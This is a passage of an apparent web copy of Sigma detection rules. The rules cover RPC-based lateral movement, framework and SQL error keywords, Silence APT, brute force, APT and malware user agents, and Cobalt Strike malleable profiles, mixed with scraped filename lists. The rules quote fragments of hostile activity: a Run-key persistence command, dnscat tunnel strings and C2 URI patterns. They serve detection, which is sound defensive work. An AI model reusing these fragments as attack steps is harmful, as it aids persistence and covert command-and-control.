  6.     - https://attack.mitre.org/techniques/T1569/002/
  7.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9
  8.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-SCMR.md
  9.     - https://github.com/zeronetworks/rpcfirewall
  10.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  11. tags:
  12.     - attack.lateral_movement
  13.     - attack.t1569.002
  14. status: experimental
  15. author: Sagie Dulce, Dekel Paz
  16. date: 2022/01/01
  17. modified: 2022/01/01
  18. logsource:
  19.     product: rpc_firewall
  20.     category: application
  21.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:367abb81-9844-35f1-ad32-98f038001003'
  22. detection:
  23.     selection:
  24.         EventLog: RPCFW
  25.         EventID: 3
  26.         InterfaceUuid: 367abb81-9844-35f1-ad32-98f038001003
  27.     condition: selection
  28. falsepositives:
  29.     - Administrative tasks on remote services
  30. level: high

Remote Schedule Task Lateral Movement via SASec

  1. title: Remote Schedule Task Lateral Movement via SASec
  2. id: aff229ab-f8cd-447b-b215-084d11e79eb0
  3. description: Detects remote RPC calls to create or execute a scheduled task via SASec
  4. references:
  5.     - https://attack.mitre.org/techniques/T1053/
  6.     - https://attack.mitre.org/tactics/TA0008/
  7.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
  8.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md
  9.     - https://github.com/zeronetworks/rpcfirewall
  10.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  11. tags:
  12.     - attack.lateral_movement
  13.     - attack.t1053
  14.     - attack.t1053.002
  15. status: experimental
  16. author: Sagie Dulce, Dekel Paz
  17. date: 2022/01/01
  18. modified: 2022/01/01
  19. logsource:
  20.     product: rpc_firewall
  21.     category: application
  22.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f"'
  23. detection:
  24.     selection:
  25.         EventLog: RPCFW
  26.         EventID: 3
  27.         InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f
  28.         OpNum:
  29.           - 0
  30.           - 1
  31.     condition: selection
  32. falsepositives:
  33.     - unknown
  34. level: high

Remote Schedule Task Lateral Movement via SASec

  1. title: Remote Schedule Task Lateral Movement via SASec
  2. id: 0a3ff354-93fc-4273-8a03-1078782de5b7
  3. description: Detects remote RPC calls to read information about scheduled tasks via SASec
  4. references:
  5.     - https://attack.mitre.org/tactics/TA0007/
  6.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
  7.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md
  8.     - https://github.com/zeronetworks/rpcfirewall
  9.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  10. status: experimental
  11. author: Sagie Dulce, Dekel Paz
  12. date: 2022/01/01
  13. modified: 2022/01/01
  14. logsource:
  15.     product: rpc_firewall
  16.     category: application
  17.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f"'
  18. detection:
  19.     selection:
  20.         EventLog: RPCFW
  21.         EventID: 3
  22.         InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f
  23.     filter:
  24.       OpNum:
  25.         - 0
  26.         - 1
  27.     condition: selection and not filter
  28. falsepositives:
  29.     - unknown
  30. level: high

SharpHound Recon Account Discovery

  1. title: SharpHound Recon Account Discovery
  2. id: 65f77b1e-8e79-45bf-bb67-5988a8ce45a5
  3. description: Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.
  4. references:
  5.     - https://attack.mitre.org/techniques/T1087/
  6.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3
  7.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-WKST.md
  8.     - https://github.com/zeronetworks/rpcfirewall
  9.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  10. tags:
  11.     - attack.t1087
  12. status: experimental
  13. author: Sagie Dulce, Dekel Paz
  14. date: 2022/01/01
  15. modified: 2022/01/01
  16. logsource:
  17.     product: rpc_firewall
  18.     category: application
  19.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:6bffd098-a112-3610-9833-46c3f87e345a opnum:2'
  20. detection:
  21.     selection:
  22.         EventLog: RPCFW
  23.         EventID: 3
  24.         InterfaceUuid: 6bffd098-a112-3610-9833-46c3f87e345a
  25.         OpNum: 2
  26.     condition: selection
  27. falsepositives:
  28.     - Unknown
  29. level: high

SharpHound Recon Sessions

  1. title: SharpHound Recon Sessions
  2. id: 6d580420-ff3f-4e0e-b6b0-41b90c787e28
  3. description: Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.
  4. references:
  5.     - https://attack.mitre.org/techniques/T1033/
  6.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183
  7.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-SRVS.md
  8.     - https://github.com/zeronetworks/rpcfirewall
  9.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  10. tags:
  11.     - attack.t1033
  12. status: experimental
  13. author: Sagie Dulce, Dekel Paz
  14. date: 2022/01/01
  15. modified: 2022/01/01
  16. logsource:
  17.     product: rpc_firewall
  18.     category: application
  19.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188 opnum:12'
  20. detection:
  21.     selection:
  22.         EventLog: RPCFW
  23.         EventID: 3
  24.         InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188
  25.         OpNum: 12
  26.     condition: selection
  27. falsepositives:
  28.     - Unknown
  29. level: high

ruby

Ruby on Rails Framework Exceptions

  1. title: Ruby on Rails Framework Exceptions
  2. id: 0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a
  3. status: stable
  4. description: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts
  5. author: Thomas Patzke
  6. date: 2017/08/06
  7. modified: 2020/09/01
  8. references:
  9.     - http://edgeguides.rubyonrails.org/security.html
  10.     - http://guides.rubyonrails.org/action_controller_overview.html
  11.     - https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception
  12.     - https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb
  13. logsource:
  14.     category: application
  15.     product: ruby_on_rails
  16. detection:
  17.     keywords:
  18.         - ActionController::InvalidAuthenticityToken
  19.         - ActionController::InvalidCrossOriginRequest
  20.         - ActionController::MethodNotAllowed
  21.         - ActionController::BadRequest
  22.         - ActionController::ParameterMissing
  23.     condition: keywords
  24. falsepositives:
  25.     - Application bugs
  26.     - Penetration testing
  27. level: medium
  28. tags:
  29.     - attack.initial_access
  30.     - attack.t1190

spring

Spring Framework Exceptions

  1. title: Spring Framework Exceptions
  2. id: ae48ab93-45f7-4051-9dfe-5d30a3f78e33
  3. status: stable
  4. description: Detects suspicious Spring framework exceptions that could indicate exploitation attempts
  5. author: Thomas Patzke
  6. date: 2017/08/06
  7. modified: 2020/09/01
  8. references:
  9.     - https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html
  10. logsource:
  11.     category: application
  12.     product: spring
  13. detection:
  14.     keywords:
  15.         - AccessDeniedException
  16.         - CsrfException
  17.         - InvalidCsrfTokenException
  18.         - MissingCsrfTokenException
  19.         - CookieTheftException
  20.         - InvalidCookieException
  21.         - RequestRejectedException
  22.     condition: keywords
  23. falsepositives:
  24.     - Application bugs
  25.     - Penetration testing
  26. level: medium
  27. tags:
  28.     - attack.initial_access
  29.     - attack.t1190

sql


Suspicious SQL Error Messages

  1. title: Suspicious SQL Error Messages
  2. id: 8a670c6d-7189-4b1c-8017-a417ca84a086
  3. status: test
  4. description: Detects SQL error messages that indicate probing for an injection attack
  5. author: Bjoern Kimminich
  6. references:
  7.   - http://www.sqlinjection.net/errors
  8. date: 2017/11/27
  9. modified: 2021/11/27
  10. logsource:
  11.   category: application
  12.   product: sql
  13. detection:
  14.   keywords:
  15.         # Oracle
  16.     - quoted string not properly terminated
  17.         # MySQL
  18.     - You have an error in your SQL syntax
  19.         # SQL Server
  20.     - Unclosed quotation mark
  21.         # SQLite
  22.     - 'near "*": syntax error'
  23.     - SELECTs to the left and right of UNION do not have the same number of result columns
  24.   condition: keywords
  25. falsepositives:
  26.   - Application bugs
  27. level: high
  28. tags:
  29.   - attack.initial_access
  30.   - attack.t1190

apt

Silence.Downloader V3

  1. title: Silence.Downloader V3
  2. id: 170901d1-de11-4de7-bccb-8fa13678d857
  3. status: test
  4. description: Detects Silence downloader. These commands are hardcoded into the binary.
  5. author: Alina Stepchenkova, Roman Rezvukhin, Group-IB, oscd.community
  6. date: 2019/11/01
  7. modified: 2021/11/27
  8. logsource:
  9.   category: process_creation
  10.   product: windows
  11. detection:
  12.   selection_recon:
  13.     Image|endswith:
  14.       - '\tasklist.exe'
  15.       - '\qwinsta.exe'
  16.       - '\ipconfig.exe'
  17.       - '\hostname.exe'
  18.     CommandLine|contains: '>>'
  19.     CommandLine|endswith: 'temps.dat'
  20.   selection_persistence:
  21.     CommandLine|contains: '/C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WinNetworkSecurity" /t REG_SZ /d'
  22.   condition: selection_recon | near selection_persistence   # requires both
  23. fields:
  24.   - ComputerName
  25.   - User
  26.   - Image
  27.   - CommandLine
  28. falsepositives:
  29.   - Unknown
  30. level: high
  31. tags:
  32.   - attack.persistence
  33.   - attack.t1547.001
  34.   - attack.discovery
  35.   - attack.t1057
  36.   - attack.t1082
  37.   - attack.t1016
  38.   - attack.t1033
  39.   - attack.g0091

Silence EDA Detection

  1. title: Silence EDA Detection
  2. id: 3ceb2083-a27f-449a-be33-14ec1b7cc973
  3. status: test
  4. description: Detects Silence empireDNSagent
  5. author: Alina Stepchenkova, Group-IB, oscd.community
  6. date: 2019/11/01
  7. modified: 2021/11/27
  8. logsource:
  9.   product: windows
  10.   service: powershell
  11. detection:
  12.   empire:
  13.     ScriptBlockText|contains|all:               # better to randomise the order
  14.       - 'System.Diagnostics.Process'
  15.       - 'Stop-Computer'
  16.       - 'Restart-Computer'
  17.       - 'Exception in execution'
  18.       - '$cmdargs'
  19.       - 'Close-Dnscat2Tunnel'
  20.   dnscat:
  21.     ScriptBlockText|contains|all:               # better to randomise the order
  22.       - 'set type=$LookupType`nserver'
  23.       - '$Command | nslookup 2>&1 | Out-String'
  24.       - 'New-RandomDNSField'
  25.       - '[Convert]::ToString($SYNOptions, 16)'
  26.       - '$Session.Dead = $True'
  27.       - '$Session["Driver"] -eq'
  28.   condition: empire and dnscat
  29. falsepositives:
  30.   - Unknown
  31. level: critical
  32. tags:
  33.   - attack.execution
  34.   - attack.t1059.001
  35.   - attack.command_and_control
  36.   - attack.t1071.004
  37.   - attack.t1572
  38.   - attack.impact
  39.   - attack.t1529
  40.   - attack.g0091
  41.   - attack.s0363

cloud

aws

azure

gcp

gworkspace

m365

okta

onelogin

compliance

default_credentials_usage.yml
firewall_cleartext_protocols.yml
group_modification_logging.yml
Changedoublequotetoquote
host_without_firewall.yml
netflow_cleartext_protocols.yml
splitglobalcleartext_protocols.yml
workstation_was_locked.yml

generic

Brute Force

  1. title: Brute Force
  2. id: 53c7cca0-2901-493a-95db-d00d6fcf0a37
  3. status: test
  4. description: Detects many authentication failures from one source to one destination which is may indicate Brute Force activity
  5. author: Aleksandr Akhremchik, oscd.community
  6. date: 2019/10/25
  7. modified: 2021/11/27
  8. logsource:
  9.   category: authentication
  10. detection:
  11.   selection:
  12.     action: failure
  13.   timeframe: 600s
  14.   condition: selection | count(category) by dst_ip > 30
  15. fields:
  16.   - src_ip
  17.   - dst_ip
  18.   - user
  19. falsepositives:
  20.   - Inventarization
  21.   - Penetration testing
  22.   - Vulnerability scanner
  23.   - Legitimate application
  24. level: medium
  25. tags:
  26.   - attack.credential_access
  27.   - attack.t1110

linux

auditd

builtin

file_create

macos

modsecurity

network_connection

other

process_creation

network

net_apt_equationgroup_c2.yml
net_dns_c2_detection.yml
net_firewall_high_dns_bytes_out.yml
net_firewall_high_dns_requests_rate.yml
net_high_dns_bytes_out.yml
net_high_dns_requests_rate.yml
net_high_null_records_requests_rate.yml
net_high_txt_records_requests_rate.yml
net_mal_dns_cobaltstrike.yml
net_pua_cryptocoin_mining_xmr.yml
Updatenet_pua_cryptocoin_mining_xmr.yml
net_susp_dns_b64_queries.yml
net_susp_dns_txt_exec_strings.yml
net_susp_network_scan_by_ip.yml
net_susp_network_scan_by_port.yml
splitglobalnet_susp_network_scan.yml
net_susp_telegram_api.yml
net_wannacry_killswitch_domain.yml

cisco/aaa

cisco_cli_clear_logs.yml
cisco_cli_collect_data.yml
cisco_cli_crypto_actions.yml
cisco_cli_disable_logging.yml
cisco_cli_discovery.yml
cisco_cli_dos.yml
cisco_cli_file_deletion.yml
cisco_cli_input_capture.yml
cisco_cli_local_accounts.yml
cisco_cli_modify_config.yml
cisco_cli_moving_data.yml
cisco_cli_net_sniff.yml

zeek

zeek_dce_rpc_domain_user_enumeration.yml
zeek_dce_rpc_mitre_bzar_execution.yml
zeek_dce_rpc_mitre_bzar_persistence.yml
zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml
zeek_dce_rpc_printnightmare_print_driver_install.yml
zeek_dce_rpc_smb_spoolss_named_pipe.yml
zeek_default_cobalt_strike_certificate.yml
zeek_dns_mining_pools.yml
zeek_dns_suspicious_zbit_flag.yml
zeek_dns_torproxy.yml
zeek_http_executable_download_from_webdav.yml
zeek_http_omigod_no_auth_rce.yml
zeek_http_webdav_put_request.yml
zeek_rdp_public_listener.yml
zeek_smb_converted_win_atsvc_task.yml
zeek_smb_converted_win_impacket_secretdump.yml
zeek_smb_converted_win_lm_namedpipe.yml
zeek_smb_converted_win_susp_psexec.yml
zeek_smb_converted_win_susp_raccess_sensitive_fext.yml
zeek_smb_converted_win_transferring_files_with_credential_data.yml
zeek_susp_kerberos_rc4.yml

proxy

proxy_download_susp_dyndns.yml
proxy_download_susp_tlds_blacklist.yml
proxy_download_susp_tlds_whitelist.yml
proxy_downloadcradle_webdav.yml
proxy_empire_ua_uri_combos.yml
proxy_empty_ua.yml
proxy_ios_implant.yml
proxy_java_class_download.yml
proxy_pwndrop.yml
proxy_raw_paste_service_access.yml
proxy_susp_flash_download_loc.yml
proxy_telegram_api.yml
proxy_ua_bitsadmin_susp_tld.yml
proxy_ua_cryptominer.yml
proxy_ua_frameworks.yml
proxy_ua_hacktool.yml
proxy_ua_malware.yml
proxy_ua_suspicious.yml
proxy_ursnif_malware_c2_url.yml
proxy_ursnif_malware_download_url.yml

APT

APT40 Dropbox Tool User Agent

  1. title: APT40 Dropbox Tool User Agent
  2. id: 5ba715b6-71b7-44fd-8245-f66893e81b3d
  3. status: test
  4. description: Detects suspicious user agent string of APT40 Dropbox tool
  5. author: Thomas Patzke
  6. references:
  7.   - Internal research from Florian Roth
  8. date: 2019/11/12
  9. modified: 2021/11/27
  10. logsource:
  11.   category: proxy
  12. detection:
  13.   selection:
  14.     c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'
  15.     r-dns: 'api.dropbox.com'
  16.   condition: selection
  17. fields:
  18.   - c-ip
  19.   - c-uri
  20. falsepositives:
  21.   - Old browsers
  22. level: high
  23. tags:
  24.   - attack.command_and_control
  25.   - attack.t1071.001
  26.   - attack.exfiltration
  27.   - attack.t1567.002

Domestic Kitten FurBall Malware Pattern

  1. title: Domestic Kitten FurBall Malware Pattern
  2. id: 6c939dfa-c710-4e12-a4dd-47e1f10e68e1
  3. status: experimental
  4. description: Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group
  5. author: Florian Roth
  6. references:
  7.     - https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/
  8. date: 2021/02/08
  9. tags:
  10.     - attack.command_and_control
  11. logsource:
  12.     category: proxy
  13. detection:
  14.     selection:
  15.         c-uri|contains: 
  16.             - 'Get~~~AllBrowser'
  17.             - 'Get~~~HardwareInfo'
  18.             - 'Take~~RecordCall'
  19.             - 'Reset~~~AllCommand'
  20.     condition: selection
  21. fields:
  22.     - c-ip
  23.     - c-uri
  24. falsepositives:
  25.     - Unlikely
  26. level: high

BabyShark Agent Pattern

  1. title: BabyShark Agent Pattern
  2. id: 304810ed-8853-437f-9e36-c4975c3dfd7e
  3. status: experimental
  4. description: Detects Baby Shark C2 Framework communication patterns
  5. author: Florian Roth
  6. date: 2021/06/09
  7. references:
  8.     - https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845
  9. logsource:
  10.     category: proxy
  11. detection:
  12.     selection:
  13.         c-uri|contains: 'momyshark?key='
  14.     condition: selection
  15. falsepositives:
  16.     - Unknown
  17. level: critical
  18. tags:
  19.     - attack.command_and_control
  20.     - attack.t1071.001

Chafer Malware URL Pattern

  1. title: Chafer Malware URL Pattern
  2. id: fb502828-2db0-438e-93e6-801c7548686d
  3. status: test
  4. description: Detects HTTP requests used by Chafer malware
  5. author: Florian Roth
  6. references:
  7.   - https://securelist.com/chafer-used-remexi-malware/89538/
  8. date: 2019/01/31
  9. modified: 2021/11/27
  10. logsource:
  11.   category: proxy
  12. detection:
  13.   selection:
  14.     c-uri|contains: '/asp.asp?ui='
  15.   condition: selection
  16. fields:
  17.   - ClientIP
  18.   - c-uri
  19.   - c-useragent
  20. falsepositives:
  21.   - Unknown
  22. level: critical
  23. tags:
  24.   - attack.command_and_control
  25.   - attack.t1071.001

Turla ComRAT

  1. title: Turla ComRAT
  2. id: 7857f021-007f-4928-8b2c-7aedbe64bb82
  3. status: test
  4. description: Detects Turla ComRAT patterns
  5. author: Florian Roth
  6. references:
  7.   - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
  8. date: 2020/05/26
  9. modified: 2021/11/27
  10. logsource:
  11.   category: proxy
  12. detection:
  13.   selection:
  14.     c-uri|contains: '/index/index.php?h='
  15.   condition: selection
  16. falsepositives:
  17.   - Unknown
  18. level: critical
  19. tags:
  20.   - attack.defense_evasion
  21.   - attack.command_and_control
  22.   - attack.t1071.001
  23.   - attack.g0010

APT UserAgent

  1. title: APT UserAgent
  2. id: 6ec820f2-e963-4801-9127-d8b2dce4d31b
  3. status: test
  4. description: Detects suspicious user agent strings used in APT malware in proxy logs
  5. author: Florian Roth, Markus Neis
  6. references:
  7.   - Internal Research
  8. date: 2019/11/12
  9. modified: 2021/11/30
  10. logsource:
  11.   category: proxy
  12. detection:
  13.   selection:
  14.     c-useragent:
  15.          # APT Related
  16.       - 'SJZJ (compatible; MSIE 6.0; Win32)'    # APT Backspace
  17.       - 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0'    # APT GrizzlySteppe - ChopStick - US CERT https://goo.gl/1DTHwi
  18.       - 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC'    # Comment Crew Miniasp
  19.       - 'Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)'    # Comment Crew Miniasp
  20.       - 'webclient'    # Naikon APT
  21.       - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200'    # Naikon APT
  22.       - 'Mozilla/4.0 (compatible; MSI 6.0;'    # SnowGlobe Babar - yes, it is cut
  23.       - 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0'    # Sofacy - Xtunnel
  24.       - 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/'    # Sofacy - Xtunnel
  25.       - 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2'    # Sofacy - Xtunnel
  26.       - 'Mozilla/4.0'    # Derusbi backdoor ELF https://github.com/fideliscyber/indicators/tree/master/FTA-1021
  27.       - 'Netscape'    # Unit78020 Malware
  28.       - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7'    # Unit78020 Malware
  29.       - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Firefox/3.6.13 GTB7.1'    # Winnti related
  30.       - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'    # Winnti related
  31.       - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)'    # APT17
  32.       - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)'    # Bronze Butler - Daserf
  33.       - 'Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)'    # Bronze Butler - Daserf
  34.       - 'Mozilla/4.0 (compatible; MSIE 8.0; Win32)'    # TSCookie https://app.any.run/tasks/0996b314-5133-491b-8d23-d431ffdec597
  35.       - 'Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1'    # Delphi downloader https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
  36.       - 'Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)'    # VPNFilter https://blog.talosintelligence.com/2018/05/VPNFilter.html
  37.       - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)'    # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
  38.       - 'Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko'    # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
  39.       - 'Mozilla v5.1 *'    # Sofacy Zebrocy samples
  40.       - 'MSIE 8.0'    # Sofacy Azzy Backdoor  from https://www.hybrid-analysis.com/sample/a80e29c0757bee05338fd5c22a542d852ad86c477068e3eb4aacc1c3e59e2eef?environmentId=100
  41.       - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)'    # https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html
  42.       - 'Mozilla/4.0 (compatible; RMS)'    # Attacks on industrial enterprises using RMS and TeamViewer https://goo.gl/GthvTw
  43.       - 'Mozilla/4.0 (compatible; MSIE 6.0; DynGate)'    # Attacks on industrial enterprises using RMS and TeamViewer https://goo.gl/GthvTw
  44.       - 'O/9.27 (W; U; Z)'   # Cmstar https://www.virustotal.com/#/file/e4328011bb2b04abc856ccd04404c9f95d67167f6c291d343e8ffa8aa2aa2099/details
  45.       - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0*'    # KerrDown UA https://goo.gl/s2WU6o
  46.       - 'Mozilla/5.0 (Windows NT 9; *'    # Suspicious 'Windows NT 9' user agent - used by APT33 malware in 2018
  47.       - 'hots scot'    # Unknown iOS zero-day implant https://twitter.com/craiu/status/1176437994288484352?s=20
  48.       - 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT)'    # https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/
  49.       - 'Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36'    # Hidden Cobra malware
  50.       - 'Mozilla/5.0 (Windows NT 6.2; Win32; rv:47.0)'    # Strong Pity loader https://twitter.com/VK_Intel/status/1264185981118406657
  51.       - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;'    # Mustang Panda https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/
  52.       - 'Mozilla/5.0 (X11; Linux i686; rv:22.0) Firefox/22.0'    # BackdoorDiplomacy https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/
  53.       - 'Mozilla/5.0 Chrome/72.0.3626.109 Safari/537.36'    # SideWalk malware used by Sparkling Goblin
  54.       - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0'  # LitePower stager used by WRITE https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044/
  55.   condition: selection
  56. fields:
  57.   - ClientIP
  58.   - c-uri
  59.   - c-useragent
  60. falsepositives:
  61.   - Old browsers
  62. level: high
  63. tags:
  64.   - attack.command_and_control
  65.   - attack.t1071.001

CobaltStrike

🙋‍♀️🙋‍♀️🙋‍♀️Cobalt Strike Malleable Amazon Browsing Traffic Profile

  1. title: CobaltStrike Malleable Amazon Browsing Traffic Profile
  2. id: 953b895e-5cc9-454b-b183-7f3db555452e
  3. status: test
  4. description: Detects Malleable Amazon Profile
  5. author: Markus Neis
  6. references:
  7.   - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/amazon.profile
  8.   - https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100
  9. date: 2019/11/12
  10. modified: 2021/11/27
  11. logsource:
  12.   category: proxy
  13. detection:
  14.   selection1:
  15.     c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
  16.     cs-method: 'GET'
  17.     c-uri: '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books'
  18.     cs-host: 'www.amazon.com'
  19.     cs-cookie|endswith: '=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996'
  20.   selection2:
  21.     c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
  22.     cs-method: 'POST'
  23.     c-uri: '/N4215/adj/amzn.us.sr.aps'
  24.     cs-host: 'www.amazon.com'
  25.   condition: selection1 or selection2
  26. falsepositives:
  27.   - Unknown
  28. level: high
  29. tags:
  30.   - attack.defense_evasion
  31.   - attack.command_and_control
  32.   - attack.t1071.001

🙋‍♀️🙋‍♀️🙋‍♀️Cobalt Strike Malformed UAs in Malleable Profiles

  1. title: CobaltStrike Malformed UAs in Malleable Profiles
  2. id: 41b42a36-f62c-4c34-bd40-8cb804a34ad8
  3. status: experimental
  4. description: Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike
  5. author: Florian Roth
  6. date: 2021/05/06
  7. modified: 2021/11/02
  8. references:
  9.   - https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/
  10. logsource:
  11.   category: proxy
  12. detection:
  13.   selection1:
  14.     c-useragent: 
  15.       - 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)'
  16.       - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E )'
  17.       - 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08'
  18.   selection2:
  19.     c-useragent|endswith: '; MANM; MANM)'
  20.   condition: 1 of selection*
  21. falsepositives:
  22.   - Unknown
  23. level: critical
  24. tags:
  25.   - attack.defense_evasion
  26.   - attack.command_and_control
  27.   - attack.t1071.001

CobaltStrike Malleable (OCSP) Profile

  1. title: CobaltStrike Malleable (OCSP) Profile
  2. id: 37325383-740a-403d-b1a2-b2b4ab7992e7
  3. status: test
  4. description: Detects Malleable (OCSP) Profile with Typo (OSCP) in URL
  5. author: Markus Neis
  6. references:
  7.   - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/ocsp.profile
  8. date: 2019/11/12
  9. modified: 2021/11/27
  10. logsource:
  11.   category: proxy
  12. detection:
  13.   selection:
  14.     c-uri|contains: '/oscp/'
  15.     cs-host: 'ocsp.verisign.com'
  17.   condition: selection
  18. falsepositives:
  19.   - Unknown
  20. level: high
  21. tags:
  22.   - attack.defense_evasion
  23.   - attack.command_and_control
  24.   - attack.t1071.001

CobaltStrike Malleable OneDrive Browsing Traffic Profile

  1. title: CobaltStrike Malleable OneDrive Browsing Traffic Profile
  2. id: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc
  3. status: test
  4. description: Detects Malleable OneDrive Profile
  5. author: Markus Neis
  6. references:
  7.   - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/onedrive_getonly.profile
  8. date: 2019/11/12
  9. modified: 2022/01/07
  10. logsource:
  11.   category: proxy
  12. detection:
  13.   selection:
  14.     cs-method: 'GET'
  15.     c-uri|endswith: '?manifest=wac'
  16.     cs-host: 'onedrive.live.com'
  17.   filter:
  18.     c-uri|startswith: 'http'
  19.     c-uri|contains: '://onedrive.live.com/'
  20.   condition: selection and not filter
  21. falsepositives:
  22.   - Unknown
